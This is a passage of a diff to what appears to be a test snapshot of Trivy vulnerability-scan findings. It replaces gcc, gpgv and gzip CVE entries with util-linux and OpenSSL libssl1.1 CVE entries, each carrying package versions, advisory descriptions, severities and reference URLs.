"https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "gcc-8-base", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4450", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4450", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", + "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", + "https://linux.oracle.com/cve/CVE-2022-4450.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", + "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4450", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "The function PEM_read_bio_ex() reads a PEM file from a BIO and parses and decodes the "name" (e.g. "CERTIFICATE"), any header data and the payload data. If the function succeeds then the "name_out", "header" and "data" arguments are populated with pointers to buffers containing the relevant decoded data. The caller is responsible for freeing those buffers. It is possible to construct a PEM file that results in 0 bytes of payload data. In this case PEM_read_bio_ex() will return a failure code but will populate the header argument with a pointer to a buffer that has already been freed. If the caller also frees this buffer then a double free will occur. This will most likely lead to a crash. This could be exploited by an attacker who has the ability to supply malicious PEM files for parsing to achieve a denial of service attack. The functions PEM_read_bio() and PEM_read() are simple wrappers around PEM_read_bio_ex() and therefore these functions are also directly affected. These functions are also called indirectly by a number of other OpenSSL functions including PEM_X509_INFO_read_bio_ex() and SSL_CTX_use_serverinfo_file() which are also vulnerable. Some OpenSSL internal uses of these functions are not vulnerable because the caller does not free the header argument if PEM_read_bio_ex() returns a failure code. These locations include the PEM_read_bio_TYPE() functions as well as the decoders introduced in OpenSSL 3.0. The OpenSSL asn1parse command line application is also impacted by this issue.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", + "name": "double free after calling PEM_read_bio_ex", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://avd.aquasec.com/nvd/cve-2022-4450", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-4450", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + }, + { + "type": "URL", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "2.2.12-1+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-34903", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", - "references": [ - "http://www.openwall.com/lists/oss-security/2022/07/02/1", - "https://access.redhat.com/errata/RHSA-2022:6602", - "https://access.redhat.com/security/cve/CVE-2022-34903", - "https://bugs.debian.org/1014157", - "https://bugzilla.redhat.com/2102868", - "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", - "https://dev.gnupg.org/T6027", - "https://errata.almalinux.org/9/ALSA-2022-6602.html", - "https://errata.rockylinux.org/RLSA-2022:6602", - "https://linux.oracle.com/cve/CVE-2022-34903.html", - "https://linux.oracle.com/errata/ELSA-2022-6602.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", - "https://security.netapp.com/advisory/ntap-20220826-0005/", - "https://ubuntu.com/security/notices/USN-5503-1", - "https://ubuntu.com/security/notices/USN-5503-2", - "https://www.cve.org/CVERecord?id=CVE-2022-34903", - "https://www.debian.org/security/2022/dsa-5174", - "https://www.openwall.com/lists/oss-security/2022/06/30/1", - ], - }, - "category": "Vulnerability", - "description": "GnuPG through 2.3.6, in unusual situations where an attacker possesses any secret-key information from a victim's keyring and other constraints (e.g., use of GPGME) are met, allows signature forgery via injection into the status line.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Signature spoofing via status line injection", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-34903", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/07/02/1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6602", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-34903", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugs.debian.org/1014157", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2102868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2102868", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34903", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://dev.gnupg.org/T6027", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6602.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:6602", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-34903.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-6602.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FRLWJQ76A4UKHI3Q36BKSJKS4LFLQO33/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NPTAR76EIZY7NQFENSOZO7U473257OVZ/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VN63GBTMRWO36Y7BKA2WQHROAKCXKCBL/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU64FUVG2PRZBSHFOQRSP7KDVEIZ23OS/", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-34903", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=63bcf189be73a9cc1264059bed6f57974be74a83", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220826-0005/", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=bbcf509bd046b34cca19c766bbddc31683d0858b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-1", + "value": "https://github.com/advisories/GHSA-v5w6-wcm8-jm4q", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5503-2", + "value": "https://linux.oracle.com/cve/CVE-2022-4450.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-34903", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5174", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4450", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/06/30/1", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0010.html", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5844-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4450", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-14855", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0215", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-14855", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", - "https://dev.gnupg.org/T4755", - "https://eprint.iacr.org/2020/014.pdf", - "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", - "https://rwc.iacr.org/2020/slides/Leurent.pdf", - "https://ubuntu.com/security/notices/USN-4516-1", - "https://usn.ubuntu.com/4516-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0215", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", + "https://github.com/advisories/GHSA-r7jw-wp68-3xch", + "https://linux.oracle.com/cve/CVE-2023-0215.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", + "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", + "https://security.netapp.com/advisory/ntap-20230427-0007/", + "https://security.netapp.com/advisory/ntap-20230427-0009/", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0215", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"The public API function BIO_new_NDEF is a helper function used for streaming +ASN.1 data via a BIO. It is primarily used internally to OpenSSL to support the +SMIME, CMS and PKCS7 streaming capabilities, but may also be called directly by +end user applications. + +The function receives a BIO from the caller, prepends a new BIO_f_asn1 filter +BIO onto the front of it to form a BIO chain, and then returns the new head of +the BIO chain to the caller. Under certain conditions, for example if a CMS +recipient public key is invalid, the new filter BIO is freed and the function +returns a NULL result indicating a failure. However, in this case, the BIO chain +is not properly cleaned up and the BIO passed by the caller still retains +internal pointers to the previously freed filter BIO. If the caller then goes on +to call BIO_pop() on the BIO then a use-after-free will occur. This will most +likely result in a crash. + + + +This scenario occurs directly in the internal function B64_write_ASN1() which +may cause BIO_new_NDEF() to be called and will subsequently call BIO_pop() on +the BIO. This internal function is in turn called by the public API functions +PEM_write_bio_ASN1_stream, PEM_write_bio_CMS_stream, PEM_write_bio_PKCS7_stream, +SMIME_write_ASN1, SMIME_write_CMS and SMIME_write_PKCS7. + +Other public API functions that may be impacted by this include +i2d_ASN1_bio_stream, BIO_new_CMS, BIO_new_PKCS7, i2d_CMS_bio_stream and +i2d_PKCS7_bio_stream. + +The OpenSSL cms and smime command line applications are similarly affected. + + + +" +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "gnupg2: OpenPGP Key Certification Forgeries with SHA-1", + "name": "use-after-free following BIO_new_NDEF", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-14855", + "value": "https://avd.aquasec.com/nvd/cve-2023-0215", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-14855", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14855", + "value": "https://access.redhat.com/security/cve/CVE-2023-0215", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14855", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4755", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://eprint.iacr.org/2020/014.pdf", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://lists.gnupg.org/pipermail/gnupg-announce/2019q4/000442.html", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-14855", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://rwc.iacr.org/2020/slides/Leurent.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4516-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4516-1/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-14855", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-3219", - "installedVersion": "2.2.12-1+deb10u1", - "packageName": "gpgv", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-3219", - "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", - "https://dev.gnupg.org/D556", - "https://dev.gnupg.org/T5993", - "https://marc.info/?l=oss-security&m=165696590211434&w=4", - "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", - "https://security.netapp.com/advisory/ntap-20230324-0001/", - "https://www.cve.org/CVERecord?id=CVE-2022-3219", - ], - }, - "category": "Vulnerability", - "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "denial of service issue (resource consumption) using compressed packets", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://dev.gnupg.org/D556", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5993", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.9-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1271", - "installedVersion": "1.9-3", - "packageName": "gzip", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:4940", - "https://access.redhat.com/security/cve/CVE-2022-1271", - "https://bugzilla.redhat.com/2073310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", - "https://errata.almalinux.org/9/ALSA-2022-4940.html", - "https://errata.rockylinux.org/RLSA-2022:4940", - "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", - "https://linux.oracle.com/cve/CVE-2022-1271.html", - "https://linux.oracle.com/errata/ELSA-2022-5052.html", - "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", - "https://security-tracker.debian.org/tracker/CVE-2022-1271", - "https://security.gentoo.org/glsa/202209-01", - "https://security.netapp.com/advisory/ntap-20220930-0006/", - "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", - "https://ubuntu.com/security/notices/USN-5378-1", - "https://ubuntu.com/security/notices/USN-5378-2", - "https://ubuntu.com/security/notices/USN-5378-3", - "https://ubuntu.com/security/notices/USN-5378-4", - "https://www.cve.org/CVERecord?id=CVE-2022-1271", - 